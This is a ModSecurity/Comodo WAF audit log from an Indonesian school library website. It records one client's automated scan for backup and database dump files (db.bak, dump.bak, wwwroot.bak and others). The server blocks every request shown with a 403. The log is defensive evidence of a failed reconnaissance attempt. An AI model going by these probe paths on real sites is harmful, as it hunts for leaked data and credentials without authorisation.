Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ade59a75-Z-- --3bc4a550-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS8wAAAJA 103.236.140.4 58354 103.236.140.4 8181 --3bc4a550-B-- GET /auth.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117360921 --3bc4a550-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3bc4a550-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883350379 1763 (- - -) Stopwatch2: 1747543883350379 1763; combined=719, p1=354, p2=338, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bc4a550-Z-- --bf76a056-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o82wAAAA4 103.236.140.4 56796 103.236.140.4 8181 --bf76a056-B-- GET /2023.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 OPR/56.0.3051.43 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224714 --bf76a056-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bf76a056-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883358114 1687 (- - -) Stopwatch2: 1747543883358114 1687; combined=708, p1=342, p2=338, p3=0, p4=0, p5=28, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf76a056-Z-- --bca82517-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS9AAAAJY 103.236.140.4 58354 103.236.140.4 8181 --bca82517-B-- GET /www.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152600732 --bca82517-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bca82517-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883358283 1717 (- - -) Stopwatch2: 1747543883358283 1717; combined=692, p1=348, p2=312, p3=0, p4=0, p5=32, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bca82517-Z-- --728e0d7c-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS9wAAAJE 103.236.140.4 58354 103.236.140.4 8181 --728e0d7c-B-- GET /smkn22jakarta.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.5.0) Gecko/20100101 Firefox/52.5.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093461 --728e0d7c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --728e0d7c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883403918 2116 (- - -) Stopwatch2: 1747543883403918 2116; combined=745, p1=366, p2=352, p3=0, p4=0, p5=27, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --728e0d7c-Z-- --a14ef045-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS-AAAAIM 103.236.140.4 58354 103.236.140.4 8181 --a14ef045-B-- GET /joomla.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1; rv:52.0.2) Gecko/20100101 Firefox/52.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224759 --a14ef045-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a14ef045-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883412119 1662 (- - -) Stopwatch2: 1747543883412119 1662; combined=711, p1=339, p2=344, p3=0, p4=0, p5=28, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a14ef045-Z-- --1ad2fe5e-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS-QAAAJM 103.236.140.4 58354 103.236.140.4 8181 --1ad2fe5e-B-- GET /dat.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224766 --1ad2fe5e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1ad2fe5e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883423104 1771 (- - -) Stopwatch2: 1747543883423104 1771; combined=769, p1=404, p2=337, p3=0, p4=0, p5=28, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ad2fe5e-Z-- --4c86882a-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o83QAAABI 103.236.140.4 56796 103.236.140.4 8181 --4c86882a-B-- GET /db.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 OPR/56.0.3051.43 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093470 --4c86882a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4c86882a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883422809 2388 (- - -) Stopwatch2: 1747543883422809 2388; combined=888, p1=396, p2=455, p3=0, p4=0, p5=37, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c86882a-Z-- --3968f158-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o83gAAAAw 103.236.140.4 56796 103.236.140.4 8181 --3968f158-B-- GET /erpustakaan_smkn22jakarta_sch_id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224769 --3968f158-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3968f158-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883429621 1647 (- - -) Stopwatch2: 1747543883429621 1647; combined=685, p1=325, p2=331, p3=0, p4=0, p5=28, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3968f158-Z-- --cd73b52f-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o84AAAAAE 103.236.140.4 56796 103.236.140.4 8181 --cd73b52f-B-- GET /erpustakaan.smkn22jakarta.sch.id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093489 --cd73b52f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cd73b52f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".smkn22jakarta.sch.id.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883571158 2195 (- - -) Stopwatch2: 1747543883571158 2195; combined=896, p1=379, p2=477, p3=0, p4=0, p5=40, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd73b52f-Z-- --4f98e379-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o84QAAABA 103.236.140.4 56796 103.236.140.4 8181 --4f98e379-B-- GET /2020.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093498 --4f98e379-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4f98e379-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883585541 1605 (- - -) Stopwatch2: 1747543883585541 1605; combined=641, p1=316, p2=299, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f98e379-Z-- --02b5fe20-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS-gAAAJU 103.236.140.4 58354 103.236.140.4 8181 --02b5fe20-B-- GET /erpustakaan.smkn22jakarta.sch.id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 OPR/56.0.3051.104 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224795 --02b5fe20-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --02b5fe20-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".smkn22jakarta.sch.id.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883587238 2638 (- - -) Stopwatch2: 1747543883587238 2638; combined=952, p1=442, p2=480, p3=0, p4=0, p5=30, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02b5fe20-Z-- --23a8d537-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS_QAAAJc 103.236.140.4 58354 103.236.140.4 8181 --23a8d537-B-- GET /smkn22jakarta.sch.id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70090975 --23a8d537-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --23a8d537-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".sch.id.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883651793 1917 (- - -) Stopwatch2: 1747543883651793 1917; combined=718, p1=336, p2=354, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23a8d537-Z-- --3e2f4537-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cS_wAAAIk 103.236.140.4 58354 103.236.140.4 8181 --3e2f4537-B-- GET /dump.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:60.5.0) Gecko/20100101 Firefox/60.5.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093545 --3e2f4537-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3e2f4537-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883704604 1793 (- - -) Stopwatch2: 1747543883704604 1793; combined=667, p1=312, p2=328, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e2f4537-Z-- --3ddc9035-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cTAAAAAIw 103.236.140.4 58354 103.236.140.4 8181 --3ddc9035-B-- GET /2017.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 OPR/56.0.3051.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 70091000 --3ddc9035-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3ddc9035-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883712508 1738 (- - -) Stopwatch2: 1747543883712508 1738; combined=630, p1=304, p2=299, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ddc9035-Z-- --df5f6e58-A-- [18/May/2025:11:51:23 +0700] aClnS_ypzAd0elWOk7o84gAAABc 103.236.140.4 56796 103.236.140.4 8181 --df5f6e58-B-- GET /back.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151224819 --df5f6e58-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --df5f6e58-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883714130 1983 (- - -) Stopwatch2: 1747543883714130 1983; combined=727, p1=367, p2=333, p3=0, p4=0, p5=27, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df5f6e58-Z-- --2e5d7619-A-- [18/May/2025:11:51:23 +0700] aClnS0PRqak7bVuUS6cTAwAAAIg 103.236.140.4 58354 103.236.140.4 8181 --2e5d7619-B-- GET /wwwroot.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.3.0) Gecko/20100101 Firefox/52.3.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151093557 --2e5d7619-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2e5d7619-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543883724493 1745 (- - -) Stopwatch2: 1747543883724493 1745; combined=642, p1=313, p2=302, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
